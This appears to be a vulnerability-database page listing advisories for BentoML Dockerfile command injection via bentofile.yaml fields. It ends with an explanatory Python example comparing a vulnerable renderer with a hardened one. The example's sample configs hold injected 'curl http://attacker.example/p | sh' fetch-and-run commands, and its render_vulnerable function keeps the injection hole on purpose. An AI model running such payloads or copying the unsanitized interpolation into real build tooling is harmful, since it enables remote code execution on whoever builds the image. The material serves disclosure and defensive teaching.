5 matches found

OSV
added 2026/05/11 2:27 p.m. · 8 views

GHSA-W2PM-X38X-JP44 Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)

BentoML envs.name Dockerfile command injection (sibling of CVE-2026-33744 / CVE-2026-35043). A malicious bentofile.yaml containing a newline-injected value in envs.name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported...

CVSS 8.8 · AI score 6 · EPSS 0.00321
Exploits: 1 · References: 5
Circl
added 2026/03/27 3:18 a.m. · 4 views

CVE-2026-33744

creationtimestamp | type | source
--- | --- | ---
2026-03-27 03:18:12+00:00 | seen | Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0
2026-04-01 16:40:10+00:00 | seen | https://bsky.app/profile/cyberhub.blog/post/3mih4ydsaer23...

CVSS 7.8 · AI score 4.8 · EPSS 0.00257
Exploits: 1 · References: 1
NVD
added 2026/03/27 1:16 a.m. · 5 views

CVE-2026-33744

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the docker.system_packages field in bentofile.yaml accepts arbitrary strings that are interpolated directly into Dockerfile RUN commands without sanitization. Since...

CVSS 7.8 · EPSS 0.00257
Exploits: 1 · References: 1
vulnersOsv
added 2026/03/27 1:16 a.m. · 7 views

ai-dynamo (=0.1.0), bento2seldon (>=0.1.0 <=0.4.0) +16 more potentially affected by CVE-2026-33744 via bentoml (>=0.10.1 <=1.4.3)

bentoml PyPI version =0.10.1, =0.1.0, =0.1.0, =0.0.10, =0.0.5, =0.3.12, =0.0.1, =1.0.3, =0.0.10, =0.0.1, =0.0.1, =0.0.13 and more. Source CVEs: CVE-2026-33744. Source advisory: OSV:PYSEC-2026-157...

CVSS 7.8 · AI score 5.8 · EPSS 0.00257
Exploits: 1
CVE
added 2026/03/27 12:45 a.m. · 18 views

CVE-2026-33744

CVE-2026-33744 affects BentoML versions prior to 1.4.37. The issue arises when the docker.system_packages field in bentofile.yaml is interpolated into Dockerfile RUN commands without sanitization, allowing arbitrary shell commands to execute during bentoml containerize or docker build. Impact is ...

CVSS 7.8 · AI score 6 · EPSS 0.00257
Exploits: 1 · References: 1 · Affected Software: 1
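The bug class the entries above describe (bentofile.yaml fields interpolated verbatim into the generated Dockerfile's RUN lines, with envs[*].name as the field that the docker.system_packages fix did not cover) is easiest to see in code. The block below is an added example written for this page, not BentoML's code and not any of the advisories' proof of concept. It is a toy Dockerfile generator that assumes a parsed bentofile carrying docker.system_packages (a list of strings) and envs (a list of name/value maps), renders envs as ENV lines (an assumption about layout, not a claim about how BentoML renders them), and puts the unsanitized renderer next to an allow-list-based one that also audits an untrusted bento before containerizing. The sample bentofiles and the attacker.example host are constructed.

```python
"""Toy bentofile.yaml -> Dockerfile generator illustrating CVE-2026-33744 and its envs[*].name
sibling GHSA-W2PM-X38X-JP44.  Written for this page; it is NOT BentoML's implementation and only
assumes the field names the advisories mention (docker.system_packages, envs[*].name)."""
import re
import shlex

# Constructed sample: hostile bentofile already parsed into a dict (no YAML dependency needed).
# Two payloads typical of this class: a ';'-chained command inside a package "name", and a
# newline inside an env name that ends the current directive and starts a fresh RUN line.
MALICIOUS_BENTOFILE = {
    "docker": {"system_packages": ["curl", "git; curl http://attacker.example/p | sh"]},
    "envs": [{"name": "APP_MODE\nRUN curl http://attacker.example/p | sh\nENV TAIL",
              "value": "prod"}],
}

# Constructed sample for the fix-bypass case: packages are clean, only the env name is hostile.
ENV_ONLY_BENTOFILE = {
    "docker": {"system_packages": ["curl"]},
    "envs": [{"name": "APP_MODE\nRUN curl http://attacker.example/p | sh", "value": "x"}],
}

# Constructed benign sample that the hardened renderer must accept.
BENIGN_BENTOFILE = {
    "docker": {"system_packages": ["curl", "libgomp1"]},
    "envs": [{"name": "APP_MODE", "value": "prod"}],
}


def render_vulnerable(cfg):
    """Pre-fix pattern: field contents are interpolated verbatim.  Do not use for real builds."""
    lines = ["FROM python:3.11-slim"]
    pkgs = cfg.get("docker", {}).get("system_packages", [])
    if pkgs:
        lines.append("RUN apt-get update && apt-get install -y " + " ".join(pkgs))
    for env in cfg.get("envs", []):
        lines.append(f"ENV {env['name']}={env['value']}")
    return "\n".join(lines) + "\n"


# Allow-lists: Debian package names (lowercase alphanumerics plus '+', '-', '.', at least two
# characters, alphanumeric first) and POSIX-style environment variable names.
PKG_RE = re.compile(r"[a-z0-9][a-z0-9+.-]+")
ENV_NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


class UnsafeBentofile(ValueError):
    """Raised when a bentofile field could change the structure of the generated Dockerfile."""


def render_hardened(cfg):
    """Validate every interpolated field against its allow-list before it reaches the Dockerfile."""
    lines = ["FROM python:3.11-slim"]
    pkgs = cfg.get("docker", {}).get("system_packages", [])
    for p in pkgs:
        if not isinstance(p, str) or not PKG_RE.fullmatch(p):
            raise UnsafeBentofile(f"refusing system package name {p!r}")
    if pkgs:
        # shlex.quote is a no-op for names that passed PKG_RE; kept as defence in depth.
        lines.append("RUN apt-get update && apt-get install -y "
                     + " ".join(shlex.quote(p) for p in pkgs))
    for env in cfg.get("envs", []):
        name, value = env.get("name"), str(env.get("value", ""))
        if not isinstance(name, str) or not ENV_NAME_RE.fullmatch(name):
            raise UnsafeBentofile(f"refusing env name {name!r}")
        # A raw newline ends a Dockerfile instruction even inside quotes, so control
        # characters in the value are rejected rather than escaped.
        if any(ord(c) < 0x20 for c in value):
            raise UnsafeBentofile(f"refusing control characters in value of {name}")
        escaped = value.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'ENV {name}="{escaped}"')
    return "\n".join(lines) + "\n"


def run_directives(dockerfile):
    """Return the RUN lines of a rendered Dockerfile (the vulnerable render of the hostile
    sample yields two: the ';'-chained apt-get line and the one injected via the env name)."""
    return [line for line in dockerfile.splitlines() if line.startswith("RUN ")]


def audit(cfg):
    """Review an untrusted bento before `bentoml containerize`: the first rejection, or None."""
    try:
        render_hardened(cfg)
    except UnsafeBentofile as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_BENTOFILE))
    print("audit (hostile):  ", audit(MALICIOUS_BENTOFILE))
    print("audit (env only): ", audit(ENV_ONLY_BENTOFILE))
    print("audit (benign):   ", audit(BENIGN_BENTOFILE))
```

The point of the second sample is the one the GHSA entry makes: validating docker.system_packages alone leaves envs[*].name as an equivalent sink, so every value that is spliced into a Dockerfile needs its own allow-list, and a newline is as dangerous as a shell metacharacter because it manufactures a whole new directive.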